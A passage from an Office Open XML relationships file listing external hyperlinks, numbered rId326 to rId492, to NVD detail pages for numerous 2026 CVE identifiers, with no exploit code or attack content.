Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100528" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100549" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100550" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100562" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100563" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100564" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100576" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100593" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93366" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100230" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100304" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100306" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100378" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100379" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100380" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100381" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100418" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100526" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100527" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100533" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100545" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100548" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100571" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100572" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45801" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55217" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56728" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56732" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56734" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56735" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61855" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63006" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63206" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63216" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80514" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84460" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85290" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86837" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92799" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93363" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93364" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97864" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100174" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100373" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56726" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6082" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6083" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6084" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6085" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6086" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6087" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6088" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63205" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63208" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67407" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100502" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17602" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39372" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100376" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100383" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27867" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67241" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85292" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85293" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49469" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67406" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80430" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95834" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67421" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100505" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100305" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100525" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100553" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100583" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100590" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19775" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6103" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91769" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92829" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97469" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100554" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88848" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78394" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78397" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97896" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97897" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-1218" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100503" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100573" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100417" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100534" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100537" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100542" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97866" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97228" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97721" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100539" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75553" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63204" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65828" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67234" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67420" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92106" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96874" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56729" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56730" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66078" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97884" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97868" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97869" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100070" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100071" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100072" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100073" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100074" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100076" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100077" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100078" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100079" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45234" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45235" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45236" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45237" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45238" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45239" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45240" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45241" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49117" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49118" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51772" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53971" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53972" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53973" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53990" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57861" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57864" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60096" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60097" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60098" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60099" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60100" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60101" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7799" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7800" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86439" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88389" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88420" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92564" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9313" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9652" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9655" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97522" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97526" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97529" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97530" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97532" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97533" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97534" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97535" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97537" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97538" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97539" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97540" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97541" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97542" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97543" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97544" TargetMode="External" Id="rId492" /><Relationship 